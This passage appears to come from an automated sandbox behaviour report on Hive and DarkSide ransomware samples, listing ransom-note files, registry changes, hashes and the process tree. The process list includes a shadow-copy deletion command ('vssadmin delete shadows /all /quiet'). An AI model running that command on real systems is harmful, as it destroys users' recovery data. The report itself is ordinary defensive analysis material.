| File created | C:\Windows\WinSxS\amd64_microsoft-windows-m..dac-rds-persist-dll_31bf3856ad364e35_10.0.19041.1_none_4a9e393bc6b3251b\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\x86_microsoft-windows-ie-f12app_31bf3856ad364e35_11.0.19041.746_none_3439cbf8eff84ce1\f\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_dual_input.inf_31bf3856ad364e35_10.0.19041.868_none_06aed3f048cb8494\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-devicepropertymanager_31bf3856ad364e35_10.0.19041.746_none_9ae154761e6a5add\f\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.Composition.Registration.resources\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-powercpl_31bf3856ad364e35_10.0.19041.423_none_3fecd70fd2fa0d37\r\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-wmi-filter.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_1b28da3746b5dd0d\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-r..systemmanufacturers_31bf3856ad364e35_10.0.19041.746_none_4d8cd7989326ef85\f\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_windows-gaming-xbox..e-service-component_31bf3856ad364e35_10.0.19041.264_none_31474dbf12ce5adc\r\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-api_31bf3856ad364e35_10.0.19041.1266_none_2b4b7ff44edc4a8b\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\INF\BITS\0411\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\INF\Windows Workflow Foundation 3.0.0.0\0409\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands.Resources\v4.0_10.0.0.0_ja_31bf3856ad364e35\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-aero.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_92ba62f3ec5ae25c\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-wpd-busenumservice_31bf3856ad364e35_10.0.19041.1_none_2def3dd96b5fea95\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.Composition.Registration.resources\v4.0_4.0.0.0_it_b77a5c561934e089\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-a..lity-eoaexperiences_31bf3856ad364e35_10.0.19041.153_none_c283d2cf01b0b7d8\r\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-kernelbase_31bf3856ad364e35_10.0.19041.1288_none_a61ec92f9e248eae\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-wmpnss-publicapi_31bf3856ad364e35_10.0.19041.746_none_69467668c56fda1a\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_windows-gaming-xbox..e-service-component_31bf3856ad364e35_10.0.19041.789_none_3136b8d712da0334\r\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-s..nter-core.resources_31bf3856ad364e35_10.0.19041.1_it-it_bb104a70cd466cf6\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-s..ransformers-onecore_31bf3856ad364e35_10.0.19041.262_none_023656085a635caf\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-t..-inputdll.resources_31bf3856ad364e35_10.0.19041.1_es-es_34064879a57dffb3\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-t..k-softkbd.resources_31bf3856ad364e35_10.0.19041.1_de-de_308c961abd2def42\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-flacencoder_31bf3856ad364e35_10.0.19041.746_none_fcdcc022ec231bfa\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.InteropServices.WindowsRuntime\v4.0_4.0.0.0__b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-driverquery.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_5586251554a4ddb1\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-u..dem-voice.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_50c12c5e7b6751b7\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2539840389-1261165778-1087677076-1000\{3DE2B3E7-739B-41F5-8C14-BBC5AECCDC21} | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\MuiCache | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c hive.bat >NUL 2>NUL
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c shadow.bat >NUL 2>NUL
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\timeout.exe
timeout 1
(the two lines above repeat for 28 consecutive launches of timeout.exe, each with the command line "timeout 1")
C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 0afeecc500f731ad21de2ce7b24e1d79 X8jK9B9SSUivmUh7Jvn8SQ.0.1.0.0.0
C:\Windows\system32\timeout.exe
timeout 1
(the two lines above repeat for 149 consecutive launches of timeout.exe, each with the command line "timeout 1")
Network
Files
memory/4004-0-0x0000000000F10000-0x00000000011E9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\hive.bat
| MD5 | 6358d970c3edccb57eae7dbf9f42d58f |
| SHA1 | 25b994c3b5604f4f67e1ac6250bc2f14ce690380 |
| SHA256 | 9e36401051e677f69a82ab8fbdebd6b16210ee40612c8c7fa45ceb5d7757fe50 |
| SHA512 | 44819fec7e90b903eece750d0a2de531520ed9e637e17e4a57786f9a61c6d4b95ff6072fc3530a9d35d8dc756bcfe20f80a6a07a72d35cf24b305053ae389131 |
C:\$Recycle.Bin\S-1-5-21-2539840389-1261165778-1087677076-1000\desktop.ini
| MD5 | f66bd8c4a0c3f208d38e64628d9a329d |
| SHA1 | 42b37f09b12463003ad23b3aa0e68c77d0aef3f8 |
| SHA256 | 4bd462a2312dabd402bbeb87bf13e933ac47284ff027d547cf46fdab7e13791b |
| SHA512 | fec4fc2f2a91f04ab87225020f12f2bddc1a0316a482d041999b6293e8e4ca0f8ce6b9a0dbaae61089c2a5909ef0ef5e27a51c7912fb1b3318b6aad950e9e4d7 |
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\shadow.bat
| MD5 | df5552357692e0cba5e69f8fbf06abb6 |
| SHA1 | 4714f1e6bb75a80a8faf69434726d176b70d7bd8 |
| SHA256 | d158f9d53e7c37eadd3b5cc1b82d095f61484e47eda2c36d9d35f31c0b4d3ff8 |
| SHA512 | a837555a1175ab515e2b43da9e493ff0ccd4366ee59defe6770327818ca9afa6f3e39ecdf5262b69253aa9e2692283ee8cebc97d58edd42e676977c7f73d143d |
memory/4004-865-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-2733-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-3489-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-4232-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-4981-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-6249-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-9141-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-9907-0x0000000000F10000-0x00000000011E9000-memory.dmp
C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.P7EsMTWem2f4DapaPblE9Dlz_RIz8E18M8Wn___Y6AI.hive
| MD5 | 9e95c9286aa916de80a68960ed66b52d |
| SHA1 | f2f8c6fd0ea28bca1a63cd2594afc3942b416c3f |
| SHA256 | 08ceabcb4f55ab059a42a4588e67b9aac327e3fe45047927a1fa7b30861a0576 |
| SHA512 | 1884c4398cbd4f7300ca03a25b1fcc814a8d2809dd438409ac9e2d1ca764569e55c6bfc60235949dade710ce0549fcbf41b929179f677219e076a895fd8d5db1 |
memory/4004-11851-0x0000000000F10000-0x00000000011E9000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat
| MD5 | c9c0dfee4ea69bbc4edbbd1684c97f7d |
| SHA1 | 1fb65f2c4b44b8c8795a8f3b7303137869d4a132 |
| SHA256 | dc7ada2e6705249f64ee7a50ad5c268ea469a38d691d05b32991ca3bb426d380 |
| SHA512 | a4c6b4bd7c21b9e54feb21e8fbf62debd93c9eb41da683156d11a24e93283e14628160780b6130df5e27704d8a5ec0bd87244d2e03c8cb735fd7809749abe5f5 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133648406469969338.txt
| MD5 | ecaea544af9da1114077b951d8cb520d |
| SHA1 | 5820b2d71e7b2543cf1804eb91716c4e9f732fde |
| SHA256 | 9117b26ab2c8fdbb8223fe1f2d1770c50a6cf0d9849a5849d6aebcbe90435be6 |
| SHA512 | dc7bedbc581818011aa2d313429f234b12e5e9cf320b02b8d7ceeaf9cdc1c921ffc51af7f4080b02740f2d2146fbb006ccbf37cdcba3e3a10009142daffdb919 |
memory/4004-11876-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-11877-0x0000000000F10000-0x00000000011E9000-memory.dmp
F:\$RECYCLE.BIN\HOW_TO_DECRYPT.txt
| MD5 | ee4ad142674725d6d9b58c9c3bb836dc |
| SHA1 | ac9bac37131c72a549d2bf3fbd233061906d5fab |
| SHA256 | fc1f1ed6a6692d18788de47420ead7e8a1b534b015db69a39052a0a2fc30c776 |
| SHA512 | a34c547d13880b578703f52b7d3d61b1893536966204d80a9e0f60aee8851bd9f70e3d0ceb1601aa11901c6315f57128c49f2000cc4fcbc67ed92e4628e45da3 |
memory/4004-18145-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-21786-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-23184-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-23189-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-23196-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-23203-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-23211-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-23216-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-23223-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-23268-0x0000000000F10000-0x00000000011E9000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win10v2004-20240704-en
Max time kernel
1695s
Max time network
1156s
Command Line
Signatures
DarkSide
Renames multiple (133) files with added filename extension
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\5a727a6e.BMP" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\5a727a6e.BMP" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\5a727a6e\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\5a727a6e.ico" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.5a727a6e | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.5a727a6e\ = "5a727a6e" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
